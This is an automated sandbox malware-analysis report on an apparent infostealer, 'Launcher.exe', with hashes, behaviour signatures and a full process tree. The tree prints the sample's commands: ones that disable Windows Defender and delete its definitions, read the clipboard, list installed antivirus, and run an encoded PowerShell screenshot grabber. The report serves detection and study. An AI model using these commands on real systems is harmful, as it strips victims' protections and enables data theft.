Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/01/2025, 21:12
Behavioral task
behavioral1
Sample
Launcher.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Launcher.exe
Resource
win10v2004-20241007-en
General
-
Target
Launcher.exe
-
Size
5.9MB
-
MD5
e632dad63d85e326f996d29455a73c5e
-
SHA1
b2790f28c60841c2cfd9334dc2b3d35a68965e56
-
SHA256
b3f3b2509384e16b578e69b3702074f91d76dd43dffc7f427072346d30900140
-
SHA512
8e68cecd310c0a7a27076b2d6f53b9b578e641d46d554ebf5fca33baac2741d8a501cb2728cf7870dc7a42dac8a2077bf1103a3ef190efb880035aec8ba5247a
-
SSDEEP
98304:+/De7pzfmyck8MMhJMjarCtaCObO/OH9KkqQz4W1kgeD2FMZi3+ML4eB:+SNzpqB6yA+KO0WRPiZkL4eB
Malware Config
Signatures
-
pid Process 4124 powershell.exe 2060 powershell.exe 2340 powershell.exe 3176 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Launcher.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4368 cmd.exe 4288 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 5036 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe 4120 Launcher.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com 18 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 1608 tasklist.exe 2004 tasklist.exe 3816 tasklist.exe 2884 tasklist.exe 1832 tasklist.exe -
resource yara_rule behavioral2/files/0x000a000000023bbc-21.dat upx behavioral2/memory/4120-25-0x00007FFAA3100000-0x00007FFAA3566000-memory.dmp upx behavioral2/files/0x000a000000023ba8-27.dat upx behavioral2/memory/4120-30-0x00007FFAB62A0000-0x00007FFAB62C4000-memory.dmp upx behavioral2/files/0x000b000000023bb3-29.dat upx behavioral2/files/0x000a000000023baf-48.dat upx behavioral2/files/0x000a000000023bae-47.dat upx behavioral2/memory/4120-46-0x00007FFAB9C30000-0x00007FFAB9C3F000-memory.dmp upx behavioral2/files/0x000a000000023bad-45.dat upx behavioral2/files/0x000a000000023bac-44.dat upx behavioral2/files/0x000a000000023bab-43.dat upx behavioral2/files/0x000a000000023baa-42.dat upx behavioral2/files/0x000a000000023ba9-41.dat upx behavioral2/files/0x000a000000023ba7-40.dat upx behavioral2/files/0x0009000000023bd3-39.dat upx behavioral2/files/0x0009000000023bd2-38.dat upx behavioral2/files/0x0009000000023bd1-37.dat upx behavioral2/files/0x000b000000023bb4-34.dat upx behavioral2/files/0x000b000000023bb2-33.dat upx behavioral2/memory/4120-54-0x00007FFAB5E10000-0x00007FFAB5E3C000-memory.dmp upx behavioral2/memory/4120-56-0x00007FFAB63D0000-0x00007FFAB63E8000-memory.dmp upx behavioral2/memory/4120-58-0x00007FFAB5D30000-0x00007FFAB5D4F000-memory.dmp upx behavioral2/memory/4120-60-0x00007FFAB2290000-0x00007FFAB240D000-memory.dmp upx behavioral2/memory/4120-62-0x00007FFAB5D10000-0x00007FFAB5D29000-memory.dmp upx behavioral2/memory/4120-64-0x00007FFAB6B40000-0x00007FFAB6B4D000-memory.dmp upx behavioral2/memory/4120-66-0x00007FFAB5CE0000-0x00007FFAB5D0E000-memory.dmp upx behavioral2/memory/4120-73-0x00007FFAB62A0000-0x00007FFAB62C4000-memory.dmp upx behavioral2/memory/4120-72-0x00007FFAA2D80000-0x00007FFAA30F5000-memory.dmp upx behavioral2/memory/4120-71-0x00007FFAB27D0000-0x00007FFAB2888000-memory.dmp upx behavioral2/memory/4120-68-0x00007FFAA3100000-0x00007FFAA3566000-memory.dmp upx behavioral2/memory/4120-76-0x00007FFAB5740000-0x00007FFAB5755000-memory.dmp upx behavioral2/memory/4120-79-0x00007FFAB5730000-0x00007FFAB573D000-memory.dmp upx behavioral2/memory/4120-78-0x00007FFAB5E10000-0x00007FFAB5E3C000-memory.dmp upx behavioral2/memory/4120-82-0x00007FFAB25F0000-0x00007FFAB2708000-memory.dmp upx behavioral2/memory/4120-81-0x00007FFAB63D0000-0x00007FFAB63E8000-memory.dmp upx behavioral2/memory/4120-107-0x00007FFAB5D30000-0x00007FFAB5D4F000-memory.dmp upx behavioral2/memory/4120-108-0x00007FFAB2290000-0x00007FFAB240D000-memory.dmp upx behavioral2/memory/4120-109-0x00007FFAB5D10000-0x00007FFAB5D29000-memory.dmp upx behavioral2/memory/4120-110-0x00007FFAB5CE0000-0x00007FFAB5D0E000-memory.dmp upx behavioral2/memory/4120-111-0x00007FFAB27D0000-0x00007FFAB2888000-memory.dmp upx behavioral2/memory/4120-112-0x00007FFAA2D80000-0x00007FFAA30F5000-memory.dmp upx behavioral2/memory/4120-128-0x00007FFAB25F0000-0x00007FFAB2708000-memory.dmp upx behavioral2/memory/4120-114-0x00007FFAA3100000-0x00007FFAA3566000-memory.dmp upx behavioral2/memory/4120-115-0x00007FFAB62A0000-0x00007FFAB62C4000-memory.dmp upx behavioral2/memory/4120-267-0x00007FFAA3100000-0x00007FFAA3566000-memory.dmp upx behavioral2/memory/4120-278-0x00007FFAA2D80000-0x00007FFAA30F5000-memory.dmp upx behavioral2/memory/4120-277-0x00007FFAB27D0000-0x00007FFAB2888000-memory.dmp upx behavioral2/memory/4120-276-0x00007FFAB5CE0000-0x00007FFAB5D0E000-memory.dmp upx behavioral2/memory/4120-273-0x00007FFAB2290000-0x00007FFAB240D000-memory.dmp upx behavioral2/memory/4120-272-0x00007FFAB5D30000-0x00007FFAB5D4F000-memory.dmp upx behavioral2/memory/4120-268-0x00007FFAB62A0000-0x00007FFAB62C4000-memory.dmp upx behavioral2/memory/4120-282-0x00007FFAA3100000-0x00007FFAA3566000-memory.dmp upx behavioral2/memory/4120-372-0x00007FFAA2D80000-0x00007FFAA30F5000-memory.dmp upx behavioral2/memory/4120-386-0x00007FFAB25F0000-0x00007FFAB2708000-memory.dmp upx behavioral2/memory/4120-385-0x00007FFAB5730000-0x00007FFAB573D000-memory.dmp upx behavioral2/memory/4120-384-0x00007FFAB5740000-0x00007FFAB5755000-memory.dmp upx behavioral2/memory/4120-383-0x00007FFAB2290000-0x00007FFAB240D000-memory.dmp upx behavioral2/memory/4120-382-0x00007FFAA3100000-0x00007FFAA3566000-memory.dmp upx behavioral2/memory/4120-381-0x00007FFAB27D0000-0x00007FFAB2888000-memory.dmp upx behavioral2/memory/4120-380-0x00007FFAB5CE0000-0x00007FFAB5D0E000-memory.dmp upx behavioral2/memory/4120-379-0x00007FFAB6B40000-0x00007FFAB6B4D000-memory.dmp upx behavioral2/memory/4120-378-0x00007FFAB5D10000-0x00007FFAB5D29000-memory.dmp upx behavioral2/memory/4120-377-0x00007FFAB5D30000-0x00007FFAB5D4F000-memory.dmp upx behavioral2/memory/4120-376-0x00007FFAB63D0000-0x00007FFAB63E8000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1056 WMIC.exe 3904 WMIC.exe 1688 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2696 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2060 powershell.exe 3176 powershell.exe 2060 powershell.exe 3176 powershell.exe 4288 powershell.exe 4288 powershell.exe 4288 powershell.exe 3740 powershell.exe 3740 powershell.exe 3740 powershell.exe 2340 powershell.exe 2340 powershell.exe 4532 powershell.exe 4532 powershell.exe 4124 powershell.exe 4124 powershell.exe 2308 powershell.exe 2308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2060 powershell.exe Token: SeDebugPrivilege 2004 tasklist.exe Token: SeDebugPrivilege 3176 powershell.exe Token: SeIncreaseQuotaPrivilege 5020 WMIC.exe Token: SeSecurityPrivilege 5020 WMIC.exe Token: SeTakeOwnershipPrivilege 5020 WMIC.exe Token: SeLoadDriverPrivilege 5020 WMIC.exe Token: SeSystemProfilePrivilege 5020 WMIC.exe Token: SeSystemtimePrivilege 5020 WMIC.exe Token: SeProfSingleProcessPrivilege 5020 WMIC.exe Token: SeIncBasePriorityPrivilege 5020 WMIC.exe Token: SeCreatePagefilePrivilege 5020 WMIC.exe Token: SeBackupPrivilege 5020 WMIC.exe Token: SeRestorePrivilege 5020 WMIC.exe Token: SeShutdownPrivilege 5020 WMIC.exe Token: SeDebugPrivilege 5020 WMIC.exe Token: SeSystemEnvironmentPrivilege 5020 WMIC.exe Token: SeRemoteShutdownPrivilege 5020 WMIC.exe Token: SeUndockPrivilege 5020 WMIC.exe Token: SeManageVolumePrivilege 5020 WMIC.exe Token: 33 5020 WMIC.exe Token: 34 5020 WMIC.exe Token: 35 5020 WMIC.exe Token: 36 5020 WMIC.exe Token: SeIncreaseQuotaPrivilege 5020 WMIC.exe Token: SeSecurityPrivilege 5020 WMIC.exe Token: SeTakeOwnershipPrivilege 5020 WMIC.exe Token: SeLoadDriverPrivilege 5020 WMIC.exe Token: SeSystemProfilePrivilege 5020 WMIC.exe Token: SeSystemtimePrivilege 5020 WMIC.exe Token: SeProfSingleProcessPrivilege 5020 WMIC.exe Token: SeIncBasePriorityPrivilege 5020 WMIC.exe Token: SeCreatePagefilePrivilege 5020 WMIC.exe Token: SeBackupPrivilege 5020 WMIC.exe Token: SeRestorePrivilege 5020 WMIC.exe Token: SeShutdownPrivilege 5020 WMIC.exe Token: SeDebugPrivilege 5020 WMIC.exe Token: SeSystemEnvironmentPrivilege 5020 WMIC.exe Token: SeRemoteShutdownPrivilege 5020 WMIC.exe Token: SeUndockPrivilege 5020 WMIC.exe Token: SeManageVolumePrivilege 5020 WMIC.exe Token: 33 5020 WMIC.exe Token: 34 5020 WMIC.exe Token: 35 5020 WMIC.exe Token: 36 5020 WMIC.exe Token: SeIncreaseQuotaPrivilege 1056 WMIC.exe Token: SeSecurityPrivilege 1056 WMIC.exe Token: SeTakeOwnershipPrivilege 1056 WMIC.exe Token: SeLoadDriverPrivilege 1056 WMIC.exe Token: SeSystemProfilePrivilege 1056 WMIC.exe Token: SeSystemtimePrivilege 1056 WMIC.exe Token: SeProfSingleProcessPrivilege 1056 WMIC.exe Token: SeIncBasePriorityPrivilege 1056 WMIC.exe Token: SeCreatePagefilePrivilege 1056 WMIC.exe Token: SeBackupPrivilege 1056 WMIC.exe Token: SeRestorePrivilege 1056 WMIC.exe Token: SeShutdownPrivilege 1056 WMIC.exe Token: SeDebugPrivilege 1056 WMIC.exe Token: SeSystemEnvironmentPrivilege 1056 WMIC.exe Token: SeRemoteShutdownPrivilege 1056 WMIC.exe Token: SeUndockPrivilege 1056 WMIC.exe Token: SeManageVolumePrivilege 1056 WMIC.exe Token: 33 1056 WMIC.exe Token: 34 1056 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1204 wrote to memory of 4120 1204 Launcher.exe 82 PID 1204 wrote to memory of 4120 1204 Launcher.exe 82 PID 4120 wrote to memory of 1916 4120 Launcher.exe 83 PID 4120 wrote to memory of 1916 4120 Launcher.exe 83 PID 4120 wrote to memory of 2040 4120 Launcher.exe 84 PID 4120 wrote to memory of 2040 4120 Launcher.exe 84 PID 4120 wrote to memory of 2416 4120 Launcher.exe 87 PID 4120 wrote to memory of 2416 4120 Launcher.exe 87 PID 4120 wrote to memory of 2988 4120 Launcher.exe 89 PID 4120 wrote to memory of 2988 4120 Launcher.exe 89 PID 1916 wrote to memory of 3176 1916 cmd.exe 91 PID 1916 wrote to memory of 3176 1916 cmd.exe 91 PID 2040 wrote to memory of 2060 2040 cmd.exe 92 PID 2040 wrote to memory of 2060 2040 cmd.exe 92 PID 2416 wrote to memory of 2004 2416 cmd.exe 93 PID 2416 wrote to memory of 2004 2416 cmd.exe 93 PID 2988 wrote to memory of 5020 2988 cmd.exe 94 PID 2988 wrote to memory of 5020 2988 cmd.exe 94 PID 4120 wrote to memory of 3056 4120 Launcher.exe 96 PID 4120 wrote to memory of 3056 4120 Launcher.exe 96 PID 3056 wrote to memory of 3780 3056 cmd.exe 98 PID 3056 wrote to memory of 3780 3056 cmd.exe 98 PID 4120 wrote to memory of 528 4120 Launcher.exe 99 PID 4120 wrote to memory of 528 4120 Launcher.exe 99 PID 528 wrote to memory of 3776 528 cmd.exe 101 PID 528 wrote to memory of 3776 528 cmd.exe 101 PID 4120 wrote to memory of 3292 4120 Launcher.exe 102 PID 4120 wrote to memory of 3292 4120 Launcher.exe 102 PID 3292 wrote to memory of 1056 3292 cmd.exe 104 PID 3292 wrote to memory of 1056 3292 cmd.exe 104 PID 4120 wrote to memory of 2424 4120 Launcher.exe 105 PID 4120 wrote to memory of 2424 4120 Launcher.exe 105 PID 2424 wrote to memory of 3904 2424 cmd.exe 107 PID 2424 wrote to memory of 3904 2424 cmd.exe 107 PID 4120 wrote to memory of 1724 4120 Launcher.exe 108 PID 4120 wrote to memory of 1724 4120 Launcher.exe 108 PID 4120 wrote to memory of 3252 4120 Launcher.exe 109 PID 4120 wrote to memory of 3252 4120 Launcher.exe 109 PID 1724 wrote to memory of 3816 1724 cmd.exe 112 PID 1724 wrote to memory of 3816 1724 cmd.exe 112 PID 3252 wrote to memory of 2884 3252 cmd.exe 113 PID 3252 wrote to memory of 2884 3252 cmd.exe 113 PID 4120 wrote to memory of 2212 4120 Launcher.exe 114 PID 4120 wrote to memory of 2212 4120 Launcher.exe 114 PID 4120 wrote to memory of 4368 4120 Launcher.exe 115 PID 4120 wrote to memory of 4368 4120 Launcher.exe 115 PID 2212 wrote to memory of 2972 2212 cmd.exe 118 PID 2212 wrote to memory of 2972 2212 cmd.exe 118 PID 4368 wrote to memory of 4288 4368 cmd.exe 119 PID 4368 wrote to memory of 4288 4368 cmd.exe 119 PID 4120 wrote to memory of 2896 4120 Launcher.exe 120 PID 4120 wrote to memory of 2896 4120 Launcher.exe 120 PID 4120 wrote to memory of 2404 4120 Launcher.exe 121 PID 4120 wrote to memory of 2404 4120 Launcher.exe 121 PID 4120 wrote to memory of 2596 4120 Launcher.exe 123 PID 4120 wrote to memory of 2596 4120 Launcher.exe 123 PID 4120 wrote to memory of 1536 4120 Launcher.exe 124 PID 4120 wrote to memory of 1536 4120 Launcher.exe 124 PID 4120 wrote to memory of 1216 4120 Launcher.exe 127 PID 4120 wrote to memory of 1216 4120 Launcher.exe 127 PID 2896 wrote to memory of 1832 2896 cmd.exe 130 PID 2896 wrote to memory of 1832 2896 cmd.exe 130 PID 2404 wrote to memory of 1184 2404 cmd.exe 131 PID 2404 wrote to memory of 1184 2404 cmd.exe 131 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1532 attrib.exe 2672 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Launcher.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Launcher.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2596
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1536
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:1216
-
